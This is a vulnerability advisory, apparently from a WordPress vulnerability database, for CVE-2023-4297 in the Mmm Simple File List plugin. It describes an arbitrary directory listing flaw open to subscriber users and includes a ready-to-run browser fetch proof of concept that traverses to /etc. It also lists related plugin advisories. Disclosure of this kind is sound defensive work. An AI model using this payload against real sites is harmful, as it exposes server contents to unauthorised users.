Mmm Simple File List <= 2.3 – Subscriber+ Arbitrary Directory Listing | CVE 2023-4297 | Plugin Vulnerabilities

Description

The plugin does not validate the generated path to list files from, allowing any authenticated users, such as subscribers, to list the content of arbitrary directories.

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as a subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=parse-media-shortcode&shortcode=[MMFileList folder="../../../../../../../../../../etc" format="table" types"" headings=""]',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

No known fix

References

CVE

Classification

Type

TRAVERSAL

OWASP top 10

CWE

CVSS

Miscellaneous

Submitter

Dmitrii

Submitter website

https://blog.cleantalk.org

Verified

Yes

WPVDB ID

9ff85b06-819c-459e-90a9-6151bfd70978

Timeline

Publicly Published

2023-11-06 (about 2 years ago)

Added

2023-11-06 (about 2 years ago)

Last Updated

2023-11-06 (about 2 years ago)

Other

Published

Title

Published

2023-11-20

Title

File Manager < 6.3 - Admin+ Arbitrary OS File/Folder Access + Path Traversal

Published

2022-08-22

Title

WPvivid Backup < 0.9.76 - Admin+ Arbitrary File Read

Published

2022-12-12

Title

Wholesale Market for WooCommerce < 2.0.0 - Admin+ Arbitrary Log Download

Published

2015-08-28

Title

NextGen Gallery < 2.1.15 - Path Traversal

Published

2019-05-23

Title

Simple File List Plugin <= 3.2.4 - Authenticated Arbitrary File Delete